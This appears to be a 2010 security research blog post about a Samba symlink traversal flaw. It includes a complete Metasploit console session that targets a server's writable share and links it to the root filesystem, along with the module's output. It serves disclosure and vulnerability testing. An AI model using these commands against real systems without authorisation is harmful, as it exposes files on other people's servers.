Exploiting the Samba Symlink Traversal
- Friday, February 5, 2010, 8:25
- Threat Research
Last night, Kingcope uploaded a video to youtube demonstrating a logic flaw in the Samba CIFS service (this was followed by a mailing list post). This bug allows any user with write access to a file share to create a symbolic link to the root filesystem. From this link, the user can access any file on the system with their current privileges. This affects any Samba service that allows anonymous write access, however read access to the filesystem is limited by normal user-level privileges. In most cases, anonymous users are limited to the 'nobody' account, limiting the damage possible through this exploit.
A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:
$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.0.2
msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared
msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted
msf auxiliary(samba_symlink_traversal) > run
Connecting to the server...
Trying to mount writeable share 'shared'...
Trying to link 'rooted' to the root filesystem...
Now access the following share to browse the root filesystem:
\\192.168.0.2\shared\rooted\
Keep in mind that non-anonymous shares can be used as well, just enter SMBUser and SMBPass for a valid user account. Continue reading...